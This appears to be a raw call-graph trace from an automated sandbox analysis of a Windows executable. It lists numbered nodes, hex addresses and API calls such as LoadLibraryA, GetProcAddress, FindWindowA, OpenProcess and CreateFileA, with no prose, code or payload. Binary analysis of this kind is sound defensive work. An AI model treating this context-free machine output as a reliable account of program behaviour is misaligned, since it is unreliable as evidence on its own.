std::ios_base::_Tidy 87793->87805 87829 11081e70 87793->87829 87796 11146a90 268 API calls 87796->87804 87799 1106151f 87840 1105ef20 265 API calls std::locale::facet::_Facet_Register 87799->87840 87801 11081d30 IsDBCSLeadByte 87801->87804 87802 11061532 87841 1105fdc0 85 API calls _TranslateName 87802->87841 87804->87773 87804->87790 87804->87796 87804->87801 87804->87805 87806 11081e70 86 API calls 87804->87806 87805->87756 87806->87804 87808 1105ee10 68 API calls 87807->87808 87809 110611a3 87808->87809 87810 110608e0 67 API calls 87809->87810 87811 110611c2 std::ios_base::_Tidy 87810->87811 87811->87755 87813 1105ee21 LeaveCriticalSection 87812->87813 87814 1105ee2b 87812->87814 87813->87814 87815 1105ee3f 87814->87815 87816 11163aa5 _free 66 API calls 87814->87816 87817 1105ee85 87815->87817 87818 1105ee49 EnterCriticalSection 87815->87818 87816->87815 87817->87767 87818->87767 87819->87768 87820->87770 87822 110611ee 87821->87822 87823 11061208 87821->87823 87843 110608e0 87822->87843 87823->87804 87839 11145bc0 268 API calls 87823->87839 87825 11061200 87851 110610f0 87825->87851 87830 11081e7d 87829->87830 87831 11081e82 87829->87831 87892 11081c50 IsDBCSLeadByte 87830->87892 87833 11081e8b 87831->87833 87834 11081e9f 87831->87834 87893 1116558e 85 API calls 3 library calls 87833->87893 87835 11081f03 87834->87835 87838 11166654 85 API calls std::locale::facet::_Facet_Register 87834->87838 87835->87793 87837 11081e98 87837->87793 87838->87834 87839->87799 87840->87802 87841->87804 87844 110608f4 87843->87844 87850 1106092c 87843->87850 87845 110608f8 87844->87845 87844->87850 87854 110606d0 87845->87854 87846 11060992 87846->87825 87850->87846 87859 11060470 67 API calls 2 library calls 87850->87859 87859->87850 87892->87831 87893->87837 87894->87371 87896 11124fd1 InitializeCriticalSection 87895->87896 87898 11124ffe GetCurrentThreadId 87896->87898 87900 11125035 87898->87900 87901 1112503c 87898->87901 87985 1110fff0 InterlockedIncrement 87900->87985 87943 11160b10 InterlockedIncrement 87901->87943 87941->87380 87944 11160b27 87943->87944 87945 11160b22 87943->87945 87947 11160b4c SelectPalette SelectPalette 87944->87947 87948 11160b38 87944->87948 88018 11160a60 271 API calls std::locale::facet::_Facet_Register 87945->88018 88020 11160750 265 API calls 87947->88020 88019 11029a70 265 API calls 2 library calls 87948->88019 87952 11160b73 88021 11160750 265 API calls 87952->88021 87954 11160b80 87955 11160b93 87954->87955 87956 11160c4e 87954->87956 88022 111606e0 265 API calls 2 library calls 87955->88022 88033 11160750 265 API calls 87956->88033 87959 11160b9e 87960 11160c5b 87985->87901 88018->87944 88020->87952 88021->87954 88022->87959 88033->87960 89053->87430 89054->87436 89055 11116880 89073 11145ef0 89055->89073 89058 111168c5 89059 111168a8 89058->89059 89060 111168d4 CoInitialize CoCreateInstance 89058->89060 89061 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89059->89061 89063 11116904 LoadLibraryA 89060->89063 89072 111168f9 89060->89072 89064 111168b6 89061->89064 89062 11145c70 std::locale::facet::_Facet_Register 90 API calls 89062->89058 89065 11116920 GetProcAddress 89063->89065 89063->89072 89066 11116930 SHGetSettings 89065->89066 89067 11116944 FreeLibrary 89065->89067 89066->89067 89067->89072 89068 111169e1 CoUninitialize 89069 111169e7 89068->89069 89070 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89069->89070 89071 111169f6 89070->89071 89072->89068 89072->89069 89074 11145c70 std::locale::facet::_Facet_Register 90 API calls 89073->89074 89075 1111689e 89074->89075 89075->89058 89075->89059 89075->89062 89076 1102ebd0 89077 1102ec13 89076->89077 89078 111101b0 std::locale::facet::_Facet_Register 265 API calls 89077->89078 89079 1102ec1a 89078->89079 89081 1102ec3a 89079->89081 90137 11143630 89079->90137 89082 11143780 86 API calls 89081->89082 89083 1102ec64 89082->89083 89084 1102ec91 89083->89084 89085 11081e70 86 API calls 89083->89085 89087 11143780 86 API calls 89084->89087 89086 1102ec76 89085->89086 89088 11081e70 86 API calls 89086->89088 89089 1102ecba 89087->89089 89088->89084 89090 11163ca7 std::locale::facet::_Facet_Register 79 API calls 89089->89090 89094 1102ecc7 89089->89094 89090->89094 89091 1102ecf6 89092 1102ed68 89091->89092 89093 1102ed4f GetSystemMetrics 89091->89093 89098 1102ed82 CreateEventA 89092->89098 89093->89092 89095 1102ed5e 89093->89095 89094->89091 89096 11145c70 std::locale::facet::_Facet_Register 90 API calls 89094->89096 89097 11147060 std::locale::facet::_Facet_Register 21 API calls 89095->89097 89096->89091 89097->89092 89099 1102ed95 89098->89099 89100 1102eda9 89098->89100 90145 11029a70 265 API calls 2 library calls 89099->90145 89101 111101b0 std::locale::facet::_Facet_Register 265 API calls 89100->89101 89103 1102edb0 89101->89103 89104 1102edd0 89103->89104 89105 11110de0 426 API calls 89103->89105 89106 111101b0 std::locale::facet::_Facet_Register 265 API calls 89104->89106 89105->89104 89107 1102ede4 89106->89107 89108 11110de0 426 API calls 89107->89108 89109 1102ee04 89107->89109 89108->89109 89110 111101b0 std::locale::facet::_Facet_Register 265 API calls 89109->89110 89111 1102ee83 89110->89111 89112 1102eeb3 89111->89112 89113 11061aa0 301 API calls 89111->89113 89114 111101b0 std::locale::facet::_Facet_Register 265 API calls 89112->89114 89113->89112 89115 1102eecd 89114->89115 89116 1102eef2 FindWindowA 89115->89116 89118 11061710 293 API calls 89115->89118 89119 1102f032 89116->89119 89120 1102ef2b 89116->89120 89118->89116 89121 11061ef0 268 API calls 89119->89121 89120->89119 89123 1102ef43 GetWindowThreadProcessId 89120->89123 89122 1102f044 89121->89122 89124 11061ef0 268 API calls 89122->89124 89125 11147060 std::locale::facet::_Facet_Register 21 API calls 89123->89125 89126 1102f050 89124->89126 89127 1102ef60 OpenProcess 89125->89127 89128 11061ef0 268 API calls 89126->89128 89127->89119 89129 1102ef7d 89127->89129 89130 1102f05c 89128->89130 90146 11094f00 105 API calls 89129->90146 89131 1102f073 89130->89131 89132 1102f06a 89130->89132 89500 111464e0 89131->89500 90147 11028360 119 API calls 2 library calls 89132->90147 89135 1102ef9c 89138 11147060 std::locale::facet::_Facet_Register 21 API calls 89135->89138 89136 1102f06f 89136->89131 89140 1102efb0 89138->89140 89139 1102f082 89141 1102f086 89139->89141 89515 1102a6d0 IsJPIK 89139->89515 89142 1102efef CloseHandle FindWindowA 89140->89142 89146 11147060 std::locale::facet::_Facet_Register 21 API calls 89140->89146 89531 11145990 ExpandEnvironmentStringsA 89141->89531 89143 1102f022 89142->89143 89144 1102f014 GetWindowThreadProcessId 89142->89144 89148 11147060 std::locale::facet::_Facet_Register 21 API calls 89143->89148 89144->89143 89147 1102efc2 SendMessageA WaitForSingleObject 89146->89147 89147->89142 89150 1102efe2 89147->89150 89151 1102f02f 89148->89151 89153 11147060 std::locale::facet::_Facet_Register 21 API calls 89150->89153 89151->89119 89155 1102efec 89153->89155 89155->89142 89156 1102f0b5 89157 1102f177 89156->89157 89555 11063880 89156->89555 89570 11027b20 89157->89570 89161 110b7df0 std::locale::facet::_Facet_Register 9 API calls 89164 1102f19c std::locale::facet::_Facet_Register 89176 1102f1b7 89164->89176 89590 1102ad70 89164->89590 89593 110287a0 89176->89593 90215 111457a0 89500->90215 89503 111457a0 std::locale::facet::_Facet_Register 265 API calls 89504 11146517 wsprintfA 89503->89504 89505 11143e00 std::locale::facet::_Facet_Register 8 API calls 89504->89505 89506 11146534 89505->89506 89507 11146560 89506->89507 89509 11143e00 std::locale::facet::_Facet_Register 8 API calls 89506->89509 89508 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89507->89508 89511 1114656c 89508->89511 89510 11146549 89509->89510 89510->89507 89512 11146550 89510->89512 89511->89139 89513 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89512->89513 89514 1114655c 89513->89514 89514->89139 89516 1102a705 89515->89516 89517 1102a7d3 89515->89517 89518 111101b0 std::locale::facet::_Facet_Register 265 API calls 89516->89518 89517->89141 89519 1102a70c 89518->89519 89520 1102a73b 89519->89520 89522 11061aa0 301 API calls 89519->89522 89521 11063880 330 API calls 89520->89521 89523 1102a759 89521->89523 89522->89520 89523->89517 89524 110d1930 268 API calls 89523->89524 89525 1102a765 89524->89525 89526 1102a7c7 89525->89526 89528 1102a798 89525->89528 89527 110d0a10 265 API calls 89526->89527 89527->89517 89529 110d0a10 265 API calls 89528->89529 89530 1102a7a4 89529->89530 89530->89141 89532 111459c7 89531->89532 89533 111459e4 std::locale::facet::_Facet_Register 89532->89533 89534 111459fe 89532->89534 89543 111459d4 89532->89543 89536 111459f5 GetModuleFileNameA 89533->89536 89535 111457a0 std::locale::facet::_Facet_Register 265 API calls 89534->89535 89537 11145a04 89535->89537 89536->89537 89541 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 89537->89541 89538 11142e60 std::locale::facet::_Facet_Register 265 API calls 89539 11145a58 89538->89539 89540 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89539->89540 89542 1102f0a3 89540->89542 89541->89543 89544 11143e00 89542->89544 89543->89538 89545 11143e21 CreateFileA 89544->89545 89547 11143ebe CloseHandle 89545->89547 89548 11143e9e 89545->89548 89551 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89547->89551 89549 11143ea2 CreateFileA 89548->89549 89550 11143edb 89548->89550 89549->89547 89549->89550 89553 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89550->89553 89552 11143ed7 89551->89552 89552->89156 89554 11143eea 89553->89554 89554->89156 89556 1105e820 79 API calls 89555->89556 89557 110638a8 89556->89557 90259 110627b0 89557->90259 89559 1102f0d6 89559->89157 89559->89161 89561 1105e950 5 API calls 89562 11063909 std::locale::facet::_Facet_Register 89561->89562 89563 1105e820 79 API calls 89562->89563 89571 11061a70 274 API calls 89570->89571 89572 11027b54 89571->89572 89573 1105e820 79 API calls 89572->89573 89575 11027b69 89573->89575 89574 11027bbf LoadIconA 89577 11027bd1 89574->89577 89578 11027bda GetSystemMetrics GetSystemMetrics LoadImageA 89574->89578 89575->89574 89576 11145ef0 std::locale::facet::_Facet_Register 90 API calls 89575->89576 89588 11027c38 89575->89588 89580 11027ba2 LoadLibraryExA 89576->89580 89577->89578 89581 11027c13 89578->89581 89582 11027bff LoadIconA 89578->89582 89579 11027cec 89583 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89579->89583 89580->89574 89580->89582 89585 11027c17 GetSystemMetrics GetSystemMetrics LoadImageA 89581->89585 89581->89588 89582->89581 89586 11027cf9 89583->89586 89585->89588 89586->89164 89587 11081e70 86 API calls 89587->89588 89588->89579 89588->89587 89589 11145c70 std::locale::facet::_Facet_Register 90 API calls 89588->89589 90865 11061e10 268 API calls 4 library calls 89588->90865 89589->89588 90866 11028c10 89590->90866 89592 1102ad7e 89594 11147060 std::locale::facet::_Facet_Register 21 API calls 89593->89594 89595 110287c6 89594->89595 89596 110288b4 89595->89596 89597 110287dd GetModuleFileNameA 89595->89597 90902 11013dd0 22 API calls 2 library calls 89596->90902 89598 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 89597->89598 89600 11028801 89598->89600 89601 110288c7 90138 11143678 90137->90138 90141 1114363e 90137->90141 90139 11142e60 std::locale::facet::_Facet_Register 265 API calls 90138->90139 90140 11143680 90139->90140 90140->89081 90141->90138 90142 11143662 90141->90142 92305 11142ee0 267 API calls std::locale::facet::_Facet_Register 90142->92305 90144 11143668 90144->89081 90146->89135 90147->89136 90216 111457c2 90215->90216 90220 111457d9 std::locale::facet::_Facet_Register 90215->90220 90257 11029a70 265 API calls 2 library calls 90216->90257 90219 11145967 90221 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 90219->90221 90220->90219 90222 1114580c GetModuleFileNameA 90220->90222 90223 11145983 wsprintfA 90221->90223 90224 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 90222->90224 90223->89503 90225 11145821 90224->90225 90226 11145831 SHGetFolderPathA 90225->90226 90227 11145918 90225->90227 90228 1114585e 90226->90228 90229 1114587d SHGetFolderPathA 90226->90229 90230 11142e60 std::locale::facet::_Facet_Register 262 API calls 90227->90230 90228->90229 90232 11145864 90228->90232 90233 111458b2 std::locale::facet::_Facet_Register 90229->90233 90230->90219 90258 11029a70 265 API calls 2 library calls 90232->90258 90236 1102ad70 std::locale::facet::_Facet_Register 145 API calls 90233->90236 90237 111458c3 90236->90237 90239 11145240 90237->90239 90240 111452ca 90239->90240 90241 1114524b 90239->90241 90240->90227 90241->90240 90242 1114525b GetFileAttributesA 90241->90242 90243 11145275 90242->90243 90244 11145267 90242->90244 90245 11164bb8 __strdup 66 API calls 90243->90245 90244->90227 90246 1114527c 90245->90246 90247 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 90246->90247 90248 11145286 90247->90248 90249 11145240 std::locale::facet::_Facet_Register 67 API calls 90248->90249 90255 111452a3 90248->90255 90250 11145296 90249->90250 90251 111452ac 90250->90251 90252 1114529e 90250->90252 90254 11163aa5 _free 66 API calls 90251->90254 90253 11163aa5 _free 66 API calls 90252->90253 90253->90255 90256 111452b1 CreateDirectoryA 90254->90256 90255->90227 90256->90255 90380 11145a70 90259->90380 90261 1106283c 90262 110d1930 268 API calls 90261->90262 90263 11062850 90262->90263 90264 11062864 std::ios_base::_Tidy 90263->90264 90265 11062a37 90263->90265 90389 1116535d 90263->90389 90266 11164c77 std::locale::facet::_Facet_Register 102 API calls 90264->90266 90270 110637a8 90264->90270 90267 1116535d _fgets 81 API calls 90265->90267 90266->90270 90271 11062a51 90267->90271 90268 110d0a10 265 API calls 90366 11062931 std::ios_base::_Tidy 90268->90366 90270->90268 90275 11062a58 90271->90275 90279 11062ab7 _strpbrk 90271->90279 90272 110628e7 90273 110628ee 90272->90273 90287 1106293d _strpbrk std::locale::facet::_Facet_Register 90272->90287 90274 11062923 90273->90274 90444 11164c77 90273->90444 90278 110d0a10 265 API calls 90274->90278 90276 11062a9d 90275->90276 90280 11164c77 std::locale::facet::_Facet_Register 102 API calls 90275->90280 90281 110d0a10 265 API calls 90276->90281 90278->90366 90408 11164536 90279->90408 90280->90276 90281->90366 90283 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 90285 110637df 90283->90285 90285->89559 90285->89561 90285->89562 90288 11163ca7 std::locale::facet::_Facet_Register 79 API calls 90287->90288 90289 110629ad 90288->90289 90366->90283 90386 11145a83 std::ios_base::_Tidy 90380->90386 90381 11145990 267 API calls 90381->90386 90382 11164ead std::locale::facet::_Facet_Register 143 API calls 90382->90386 90383 11145aea std::ios_base::_Tidy 90383->90261 90384 11145aa5 GetLastError 90385 11145ab0 Sleep 90384->90385 90384->90386 90387 11164ead std::locale::facet::_Facet_Register 143 API calls 90385->90387 90386->90381 90386->90382 90386->90383 90386->90384 90388 11145ac2 90387->90388 90388->90383 90388->90386 90390 11165369 __close 90389->90390 90391 1116537c 90390->90391 90392 111653ad 90390->90392 90508 1116a1af 66 API calls __getptd_noexit 90391->90508 90398 1116538c __close 90392->90398 90482 1116be59 90392->90482 90394 11165381 90509 1116edc4 11 API calls __mbschr_l 90394->90509 90398->90272 90402 11165431 90403 1116545e 90402->90403 90488 11172885 90402->90488 90409 1116454f 90408->90409 90410 111642e0 strtoxl 79 API calls 90409->90410 90411 11062ae1 90410->90411 90445 11164c83 __close 90444->90445 90483 1116be8d EnterCriticalSection 90482->90483 90484 1116be6b 90482->90484 90486 111653bb 90483->90486 90484->90483 90485 1116be73 90484->90485 90487 1117459f __lock 66 API calls 90485->90487 90486->90402 90510 1116a147 90486->90510 90487->90486 90508->90394 90509->90398 90511 1116a153 90510->90511 90512 1116a168 90510->90512 90865->89588 90867 11028c33 90866->90867 90868 1102927b 90866->90868 90869 11028cf0 GetModuleFileNameA 90867->90869 90878 11028c68 90867->90878 90870 11029317 90868->90870 90871 1102932a 90868->90871 90872 11028d11 _strrchr 90869->90872 90873 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 90870->90873 90874 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 90871->90874 90875 11164ead std::locale::facet::_Facet_Register 143 API calls 90872->90875 90876 11029326 90873->90876 90877 1102933b 90874->90877 90879 11028ceb 90875->90879 90876->89592 90877->89592 90878->90878 90881 11164ead std::locale::facet::_Facet_Register 143 API calls 90878->90881 90879->90868 90896 11026ef0 81 API calls 2 library calls 90879->90896 90881->90879 90902->89601 92305->90144 92320 110262f0 92321 110262fe GetProcAddress 92320->92321 92322 1102630f 92320->92322 92321->92322 92323 11026328 92322->92323 92324 1102631c K32GetProcessImageFileNameA 92322->92324 92325 1102632e GetProcAddress 92323->92325 92326 1102633f 92323->92326 92324->92323 92327 11026361 92324->92327 92325->92326 92328 11026346 92326->92328 92329 11026357 SetLastError 92326->92329 92329->92327 92330 1113d980 92331 1113d989 92330->92331 92332 1113d98e 92330->92332 92334 11139ed0 92331->92334 92335 11139f12 92334->92335 92336 11139f07 GetCurrentThreadId 92334->92336 92337 11139f20 92335->92337 92468 11029950 92335->92468 92336->92335 92475 11134830 92337->92475 92343 1113a011 92349 1113a042 FindWindowA 92343->92349 92352 1113a0da 92343->92352 92344 1113a59a 92345 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 92344->92345 92347 1113a5b2 92345->92347 92347->92332 92348 11139f5c IsWindow IsWindowVisible 92350 11147060 std::locale::facet::_Facet_Register 21 API calls 92348->92350 92351 1113a057 IsWindowVisible 92349->92351 92349->92352 92353 11139f87 92350->92353 92351->92352 92354 1113a05e 92351->92354 92355 1105e820 79 API calls 92352->92355 92365 1113a0ff 92352->92365 92357 1105e820 79 API calls 92353->92357 92354->92352 92358 11139a70 392 API calls 92354->92358 92379 1113a127 92355->92379 92356 1113a2b0 92361 1113a2ca 92356->92361 92362 11139a70 392 API calls 92356->92362 92360 11139fa3 IsWindowVisible 92357->92360 92363 1113a07f IsWindowVisible 92358->92363 92359 1105e820 79 API calls 92366 1113a29f 92359->92366 92360->92343 92367 11139fb1 92360->92367 92364 1113a2e7 92361->92364 92711 1106c340 298 API calls 92361->92711 92362->92361 92363->92352 92368 1113a08e IsIconic 92363->92368 92712 1112ddd0 12 API calls 2 library calls 92364->92712 92365->92356 92365->92359 92366->92356 92371 1113a2a4 92366->92371 92367->92343 92372 11139fb9 92367->92372 92368->92352 92373 1113a09f GetForegroundWindow 92368->92373 92710 1102d750 294 API calls std::locale::facet::_Facet_Register 92371->92710 92376 11147060 std::locale::facet::_Facet_Register 21 API calls 92372->92376 92708 11132120 147 API calls 92373->92708 92374 1113a2ec 92381 1113a2f4 92374->92381 92382 1113a2fd 92374->92382 92377 11139fc3 GetForegroundWindow 92376->92377 92384 11139fd2 EnableWindow 92377->92384 92385 11139ffe 92377->92385 92379->92365 92380 1113a174 92379->92380 92387 11081d30 IsDBCSLeadByte 92379->92387 92389 11143e00 std::locale::facet::_Facet_Register 8 API calls 92380->92389 92713 11132a10 89 API calls 3 library calls 92381->92713 92390 1113a314 92382->92390 92391 1113a308 92382->92391 92383 1113a2ab 92383->92356 92706 11132120 147 API calls 92384->92706 92385->92343 92401 1113a00a SetForegroundWindow 92385->92401 92386 1113a0ae 92709 11132120 147 API calls 92386->92709 92387->92380 92396 1113a186 92389->92396 92715 111326b0 299 API calls std::locale::facet::_Facet_Register 92390->92715 92397 1113a319 92391->92397 92714 11132780 299 API calls std::locale::facet::_Facet_Register 92391->92714 92395 1113a2fa 92395->92382 92403 1113a193 GetLastError 92396->92403 92415 1113a1a1 92396->92415 92399 1113a312 92397->92399 92400 1113a429 92397->92400 92398 11139fe9 92707 11132120 147 API calls 92398->92707 92399->92397 92406 1113a331 92399->92406 92407 1113a3db 92399->92407 92408 11139600 295 API calls 92400->92408 92401->92343 92402 1113a0b5 92409 1113a0cb EnableWindow 92402->92409 92412 1113a0c4 SetForegroundWindow 92402->92412 92410 11147060 std::locale::facet::_Facet_Register 21 API calls 92403->92410 92406->92400 92417 111101b0 std::locale::facet::_Facet_Register 265 API calls 92406->92417 92407->92400 92723 1103f920 68 API calls 92407->92723 92427 1113a42e 92408->92427 92409->92352 92410->92415 92411 11139ff0 EnableWindow 92411->92385 92412->92409 92413 1113a455 92424 1105e820 79 API calls 92413->92424 92467 1113a57a std::ios_base::_Tidy 92413->92467 92415->92365 92416 1113a1f2 92415->92416 92419 11081d30 IsDBCSLeadByte 92415->92419 92421 11143e00 std::locale::facet::_Facet_Register 8 API calls 92416->92421 92420 1113a352 92417->92420 92418 1113a3ea 92724 1103f960 68 API calls 92418->92724 92419->92416 92425 1113a373 92420->92425 92716 11057eb0 306 API calls std::locale::facet::_Facet_Register 92420->92716 92426 1113a204 92421->92426 92423 1113a3f5 92725 1103f980 68 API calls 92423->92725 92441 1113a485 92424->92441 92717 1110fff0 InterlockedIncrement 92425->92717 92426->92365 92430 1113a20b GetLastError 92426->92430 92427->92413 92622 11142d90 92427->92622 92433 11147060 std::locale::facet::_Facet_Register 21 API calls 92430->92433 92432 1113a400 92726 1103f940 68 API calls 92432->92726 92433->92365 92436 1113a398 92718 1104d790 823 API calls 92436->92718 92438 1113a40b 92727 11110000 InterlockedDecrement 92438->92727 92439 1113a3a3 92719 1104ecd0 823 API calls 92439->92719 92442 1113a4cd 92441->92442 92445 1113a4aa 92441->92445 92446 1113a4d9 GetTickCount 92441->92446 92441->92467 92442->92446 92442->92467 92444 1113a3d9 92444->92400 92448 11147060 std::locale::facet::_Facet_Register 21 API calls 92445->92448 92449 1113a4eb 92446->92449 92446->92467 92447 1113a3ae 92720 1104ed40 823 API calls 92447->92720 92451 1113a4b5 GetTickCount 92448->92451 92452 11143a50 145 API calls 92449->92452 92451->92467 92454 1113a4f7 92452->92454 92453 1113a3b9 92721 1104d7d0 823 API calls 92453->92721 92455 11147af0 269 API calls 92454->92455 92457 1113a502 92455->92457 92459 11143a50 145 API calls 92457->92459 92458 1113a3c4 92458->92400 92722 110ec320 285 API calls 92458->92722 92460 1113a515 92459->92460 92728 110261a0 LoadLibraryA 92460->92728 92463 1113a522 92463->92463 92729 1112d6e0 GetProcAddress SetLastError 92463->92729 92465 1113a569 92466 1113a573 FreeLibrary 92465->92466 92465->92467 92466->92467 92467->92344 92730 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 92468->92730 92470 1102995e 92471 11029973 92470->92471 92731 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 92470->92731 92732 11089fe0 269 API calls 2 library calls 92471->92732 92474 1102997e 92474->92337 92476 11134872 92475->92476 92477 11134b94 92475->92477 92479 1105e820 79 API calls 92476->92479 92478 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 92477->92478 92481 11134bac 92478->92481 92480 11134892 92479->92480 92480->92477 92482 1113489a GetLocalTime 92480->92482 92523 11134310 92481->92523 92483 111348d1 LoadLibraryA 92482->92483 92484 111348b0 92482->92484 92733 11009940 LoadLibraryA 92483->92733 92485 11147060 std::locale::facet::_Facet_Register 21 API calls 92484->92485 92487 111348c5 92485->92487 92487->92483 92488 11134925 92734 110161e0 LoadLibraryA 92488->92734 92490 11134930 GetCurrentProcess 92491 11134955 GetProcAddress 92490->92491 92492 1113496d GetProcessHandleCount 92490->92492 92491->92492 92493 11134976 SetLastError 92491->92493 92494 1113497e 92492->92494 92493->92494 92495 111349a2 92494->92495 92496 11134988 GetProcAddress 92494->92496 92498 111349b0 GetProcAddress 92495->92498 92500 111349ca 92495->92500 92496->92495 92497 111349d7 SetLastError 92496->92497 92497->92498 92499 111349e4 SetLastError 92498->92499 92498->92500 92501 111349ef GetProcAddress 92499->92501 92500->92501 92502 11134a01 K32GetProcessMemoryInfo 92501->92502 92503 11134a0f SetLastError 92501->92503 92504 11134a17 92502->92504 92503->92504 92505 11147060 std::locale::facet::_Facet_Register 21 API calls 92504->92505 92509 11134a8d 92504->92509 92505->92509 92506 11134b6a 92507 11134b7a FreeLibrary 92506->92507 92508 11134b7d 92506->92508 92507->92508 92510 11134b87 FreeLibrary 92508->92510 92511 11134b8a 92508->92511 92509->92506 92513 1105e820 79 API calls 92509->92513 92510->92511 92511->92477 92512 11134b91 FreeLibrary 92511->92512 92512->92477 92514 11134ade 92513->92514 92515 1105e820 79 API calls 92514->92515 92516 11134b06 92515->92516 92517 1105e820 79 API calls 92516->92517 92518 11134b2d 92517->92518 92519 1105e820 79 API calls 92518->92519 92520 11134b54 92519->92520 92520->92506 92521 11134b65 92520->92521 92735 11027de0 265 API calls 2 library calls 92521->92735 92525 1113433d 92523->92525 92524 111347f9 92524->92343 92524->92344 92626 11139a70 92524->92626 92525->92524 92526 110d1930 268 API calls 92525->92526 92527 1113439e 92526->92527 92528 110d1930 268 API calls 92527->92528 92529 111343a9 92528->92529 92530 111343d7 92529->92530 92531 111343ee 92529->92531 92736 11029a70 265 API calls 2 library calls 92530->92736 92533 11147060 std::locale::facet::_Facet_Register 21 API calls 92531->92533 92535 111343fc 92533->92535 92737 110d1530 265 API calls 92535->92737 92623 11142d9a 92622->92623 92625 11142daf 92622->92625 92738 11142400 92623->92738 92625->92413 92629 11139a8d 92626->92629 92682 11139eaf 92626->92682 92627 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 92628 11139ebe 92627->92628 92628->92348 92630 11145c70 std::locale::facet::_Facet_Register 90 API calls 92629->92630 92629->92682 92631 11139acc 92630->92631 92632 1105e820 79 API calls 92631->92632 92631->92682 92633 11139afb 92632->92633 92870 1112d860 92633->92870 92635 11139c40 PostMessageA 92637 11139c55 92635->92637 92636 1105e820 79 API calls 92638 11139c3c 92636->92638 92639 11139c65 92637->92639 92879 11110000 InterlockedDecrement 92637->92879 92638->92635 92638->92637 92640 11139c6b 92639->92640 92641 11139c8d 92639->92641 92645 11139cc3 std::ios_base::_Tidy 92640->92645 92646 11139cde 92640->92646 92880 11131320 315 API calls std::locale::facet::_Facet_Register 92641->92880 92644 11139c95 92881 11147ad0 267 API calls 92644->92881 92652 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 92645->92652 92647 11143a50 145 API calls 92646->92647 92650 11139ce3 92647->92650 92653 11147af0 269 API calls 92650->92653 92651 11139c9f 92882 1112da60 SetDlgItemTextA 92651->92882 92655 11139cda 92652->92655 92656 11139cea SetWindowTextA 92653->92656 92655->92348 92658 11139d06 92656->92658 92664 11139d0d std::ios_base::_Tidy 92656->92664 92657 11139cb0 std::ios_base::_Tidy 92657->92640 92883 111361c0 299 API calls 5 library calls 92658->92883 92659 11146710 271 API calls 92661 11139beb 92659->92661 92661->92635 92661->92636 92662 11139d64 92665 11139e3c 92662->92665 92675 11139d78 92662->92675 92663 11139d37 92663->92662 92668 11139d4c 92663->92668 92664->92662 92664->92663 92884 111361c0 299 API calls 5 library calls 92664->92884 92667 11139e5d 92665->92667 92671 11139e4b 92665->92671 92672 11139e44 92665->92672 92892 110f8b70 86 API calls 92667->92892 92885 11132120 147 API calls 92668->92885 92669 11139d9c 92888 110f8b70 86 API calls 92669->92888 92891 11132120 147 API calls 92671->92891 92890 111361c0 299 API calls 5 library calls 92672->92890 92675->92669 92886 111361c0 299 API calls 5 library calls 92675->92886 92676 11139da7 92676->92682 92683 11139daf IsWindowVisible 92676->92683 92678 11139d5c 92678->92662 92680 11139e68 92680->92682 92685 11139e6c IsWindowVisible 92680->92685 92682->92627 92683->92682 92689 11139dc6 92683->92689 92684 11139e5a 92684->92667 92685->92682 92687 11139e7e IsWindowVisible 92685->92687 92686 11139d86 92686->92669 92688 11139d92 92686->92688 92687->92682 92690 11139e8b EnableWindow 92687->92690 92887 11132120 147 API calls 92688->92887 92692 11145c70 std::locale::facet::_Facet_Register 90 API calls 92689->92692 92893 11132120 147 API calls 92690->92893 92695 11139dd1 92692->92695 92694 11139d99 92694->92669 92695->92682 92697 11139ddc GetForegroundWindow IsWindowVisible 92695->92697 92696 11139ea2 EnableWindow 92696->92682 92698 11139e01 92697->92698 92699 11139df6 EnableWindow 92697->92699 92889 11132120 147 API calls 92698->92889 92699->92698 92701 11139e08 92702 11139e1e EnableWindow 92701->92702 92703 11139e17 SetForegroundWindow 92701->92703 92704 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 92702->92704 92703->92702 92705 11139e38 92704->92705 92705->92348 92706->92398 92707->92411 92708->92386 92709->92402 92710->92383 92711->92364 92712->92374 92713->92395 92714->92399 92715->92397 92716->92425 92717->92436 92718->92439 92719->92447 92720->92453 92721->92458 92722->92444 92723->92418 92724->92423 92725->92432 92726->92438 92727->92444 92728->92463 92729->92465 92730->92470 92731->92470 92732->92474 92733->92488 92734->92490 92735->92506 92739 1114243f 92738->92739 92791 11142438 std::ios_base::_Tidy 92738->92791 92740 111101b0 std::locale::facet::_Facet_Register 265 API calls 92739->92740 92741 11142446 92740->92741 92743 11142476 92741->92743 92745 11061aa0 301 API calls 92741->92745 92742 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 92744 11142d8a 92742->92744 92746 11062220 275 API calls 92743->92746 92744->92625 92745->92743 92747 111424b2 92746->92747 92748 111424b9 RegCloseKey 92747->92748 92749 111424c0 std::locale::facet::_Facet_Register 92747->92749 92748->92749 92750 111424cf 92749->92750 92751 1102a6d0 354 API calls 92749->92751 92752 11145990 267 API calls 92750->92752 92751->92750 92753 111424ec 92752->92753 92754 11143e00 